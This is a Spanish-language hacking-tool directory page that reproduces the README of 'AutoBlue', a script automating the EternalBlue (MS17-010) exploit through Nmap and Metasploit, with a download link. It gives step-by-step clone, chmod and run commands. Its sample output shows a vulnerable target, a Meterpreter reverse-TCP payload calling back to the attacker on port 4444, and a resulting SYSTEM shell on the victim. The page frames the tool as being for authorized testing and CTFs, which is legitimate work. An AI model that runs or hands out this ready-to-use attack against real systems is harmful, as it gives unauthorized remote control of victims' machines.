Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
autoblue — AutoBlue - Herramienta automatizada de explotación de EternalBlue (CVE-2017-0144 / MS17-010) que utiliza Nmap y Metasploit para hacking ético, pruebas de penetración y desafíos CTF. ¡Estrictamente solo para uso autorizado y educativo! | Kitploit
Herramientas/GitHubGitHub/atithkhawas/autoblue
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónPost-ExplotaciónCTFPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubatithkhawas/autoblue

autoblue

AutoBlue - Herramienta automatizada de explotación de EternalBlue (CVE-2017-0144 / MS17-010) que utiliza Nmap y Metasploit para hacking ético, pruebas de penetración y desafíos CTF. ¡Estrictamente solo para uso autorizado y educativo!

4110hace 1 añoAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

AUTOBLUE: Herramienta Automatizada de Explotación EternalBlue

AUTOBLUE es una herramienta de automatización diseñada para explotar la vulnerabilidad EternalBlue (CVE-2017-0144) en máquinas Windows. La herramienta integra el poder de Nmap para el escaneo de vulnerabilidades y msfconsole de Metasploit para la explotación, permitiendo a los usuarios identificar automáticamente sistemas vulnerables y lanzar el exploit EternalBlue para obtener acceso remoto al objetivo.

Esta herramienta está diseñada principalmente para profesionales de la seguridad, probadores de penetración y hackers éticos que trabajan en entornos controlados y autorizados, como desafíos Capture The Flag (CTF), compromisos de pruebas de penetración o configuraciones de laboratorio. AUTOBLUE permite a los usuarios explotar la vulnerabilidad EternalBlue con una intervención manual mínima, simplemente ingresando la dirección IP del objetivo.

Características

  • Escaneo Automatizado de Vulnerabilidades: Utiliza Nmap para escanear la vulnerabilidad EternalBlue (CVE-2017-0144) en la máquina objetivo.

  • Explotación Sin Problemas: Aprovecha msfconsole de Metasploit para lanzar el exploit EternalBlue automáticamente.

  • Configuración Sencilla: Solo requiere una dirección IP objetivo y un entorno de trabajo con Nmap y Metasploit instalados.

  • Informe de Salida: Genera una salida que indica el éxito o fracaso del intento de explotación.

Tabla de Contenidos

  • Requisitos Previos

  • Instalación

  • Uso

  • Cómo Funciona

  • Consideraciones de Seguridad

  • Contribuciones

  • Licencia

  • Agradecimientos

  • Descargo de Responsabilidad

Requisitos Previos:

Antes de usar AUTOBLUE, asegúrese de que las siguientes herramientas estén instaladas en su máquina:

Nmap: Una herramienta de escaneo de red para detectar máquinas vulnerables.

Metasploit Framework: Una plataforma de pruebas de penetración que incluye exploits para EternalBlue.

Instalar Nmap:

  • En Linux (basado en Debian):

Copiar código

      sudo apt update

y

      sudo apt install nmap

En Windows o macOS, descargue Nmap desde el sitio web oficial.

Instalar Metasploit:

En Linux (basado en Debian):

Copiar código

      sudo apt update

y

     sudo apt install metasploit-framework
     

En Windows o macOS, descargue Metasploit desde el sitio web oficial.

Instalación:

Para instalar AUTOBLUE, siga estos pasos:

  • Clonar el repositorio:

      git clone https://github.com/AtithKhawas/autoblue.git
    

    y

         cd autoblue
    

Asegúrese de que Nmap y Metasploit estén correctamente instalados como requisitos previos.

  • Hacer ejecutable el script:

    chmod +x autoblue.sh
    

Uso:

AUTOBLUE está diseñado para automatizar el escaneo y la explotación de la vulnerabilidad EternalBlue. Aquí se explica cómo usarlo:

  • Ejecutar la Herramienta

Para usar AUTOBLUE, ejecute el siguiente comando en su terminal:

Copiar código

     ./autoblue.sh 

Salida:

     ┌──(root㉿kali)-[/home/Elliot] 
     └─# ./autoblue.sh 
     ============================================
     ********************************************
     AutoBlue    - EternalBlue Exploit Automation
     ********************************************
     ********************************************
     ------------------------Made by ATITH KHAWAS
     ============================================
     Enter Target IP Address:

Solicitará la dirección IP del objetivo y la suya.

Ejemplo

      Enter Target IP Address: Target<IP Address>
      Enter Your IP Address: Your <IP Address>

Una vez que ejecute la herramienta, comenzará a escanear con Nmap:

Salida-1

 Target IP Address: ***.***.**.**
 [+] Scanning Target for MS17-010 Vulnerability...
 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
 Nmap scan report for ***.***.**.**
 Host is up (0.19s latency).

 PORT    STATE SERVICE
 445/tcp open  microsoft-ds

 Host script results:
 | smb-vuln-ms17-010: 
 |   VULNERABLE:
 |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
 |     State: VULNERABLE
 |     IDs:  CVE:CVE-2017-0143
 |     Risk factor: HIGH
 |       A critical remote code execution vulnerability exists in Microsoft SMBv1
 |        servers (ms17-010).
 |           
 |     Disclosure date: 2017-03-14
 |     References:
 |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
 |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
 |_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

 Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
 [+] Target is VULNERABLE to EternalBlue!

Aquí es donde comienza el verdadero trabajo, reduciendo significativamente el proceso que consume tiempo. Si el objetivo es vulnerable, lanza automáticamente Msfconsole y configura RHOSTS, PAYLOAD, LHOST y LPORT con el puerto predeterminado 4444.

Salida-2

      [+] Launching Metasploit...
      [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
      RHOSTS => ***.***.**.**
      PAYLOAD => windows/x64/meterpreter/reverse_tcp
      LHOST => ***.***.**.**
      LPORT => 4444
      [*] Started reverse TCP handler on ***.***.**.**:4444 

Y nos proporciona la shell Meterpreter del objetivo.

Salida-3

       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

       meterpreter > pwd
       C:\Windows\system32

Cómo Funciona:

  • Escaneo de Scripts de Nmap: La herramienta primero usa Nmap Script Scan (--script smb-vuln-ms17-010) para detectar si la máquina objetivo es vulnerable al exploit EternalBlue. Verifica si el puerto 445 está abierto e intenta identificar vulnerabilidades SMB.

  • Exploit de Metasploit: Si la máquina objetivo se encuentra vulnerable, AUTOBLUE procede a lanzar el exploit EternalBlue usando msfconsole de Metasploit. El script configurará y enviará el payload necesario para explotar la vulnerabilidad.

  • Shell Reversa: Si el exploit tiene éxito, se abrirá una shell reversa para proporcionar una interfaz de línea de comandos en la máquina víctima.

  • Retroalimentación: La herramienta proporciona retroalimentación durante todo el proceso, incluyendo si el objetivo fue explotado con éxito, y muestra cualquier información relevante (por ejemplo, dirección IP de la shell reversa).

Consideraciones de Seguridad:

  • Uso Legal: Esta herramienta solo debe usarse en entornos autorizados. Asegúrese de tener permiso explícito para probar la máquina objetivo y de que no sea ilegal hacerlo en su jurisdicción.

  • Entrada del Usuario: Asegúrese de que solo se ingresen IPs de confianza en la herramienta para evitar mal uso. Ejecutar esta herramienta en sistemas no confiables podría provocar incidentes de seguridad.

  • Seguridad del Payload: El payload de shell reversa utilizado en esta herramienta es inherentemente riesgoso. No exponga la máquina de ataque ni sus listeners a redes no confiables.

  • Mantenga las Dependencias Actualizadas: Asegúrese de actualizar regularmente Nmap y Metasploit para mitigar vulnerabilidades de seguridad conocidas en esas herramientas.

Contribuciones:

Las contribuciones al proyecto AUTOBLUE son bienvenidas. Si tiene alguna sugerencia, mejora o corrección de errores, no dude en bifurcar el repositorio y crear un pull request.

Licencia:

Descargar herramienta